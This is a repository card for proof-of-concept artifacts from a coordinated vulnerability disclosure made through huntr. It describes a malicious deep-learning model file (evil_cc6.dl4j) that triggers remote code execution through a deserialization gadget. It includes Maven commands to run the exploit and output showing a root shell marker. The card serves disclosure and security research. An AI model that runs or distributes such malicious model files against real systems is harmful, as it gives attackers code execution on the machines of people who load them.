You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

YAML Metadata Warning:empty or missing yaml metadata in repo card

Check out the documentation for more information.

PoC artifacts — privately reported via huntr.com

These are proof-of-concept artifacts attached to a security vulnerability reported privately through huntr.com and under coordinated disclosure. Technical details, root-cause analysis and reproduction steps are in the huntr report (not published here).

Please do not redistribute or run these against systems you do not own.

Run (needs JDK 11+ and Maven; deps pulled from Maven Central)

mvn -q compile
# (A) load the PROVIDED malicious model -> RCE (real gadget; needs commons-collections<=3.2.1, in this pom):
mvn -q exec:java -Dexec.mainClass=Load
#     [+] Shipped .dl4j standalone load -> RCE? YES
# (B) minimal sink proof, no third-party gadget:
mvn -q exec:java -Dexec.mainClass=Poc
#     [+] RCE marker: uid=0(root) gid=0(root) groups=0(root)

Files: evil_cc6.dl4j (provided malicious model), Load.java (loads it), GCC6.java (regenerates it), Poc.java (no-deps sink proof). Details in the huntr report.

Contact via the huntr report.

Downloads last month: -; Downloads are not tracked for this model. How to track

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support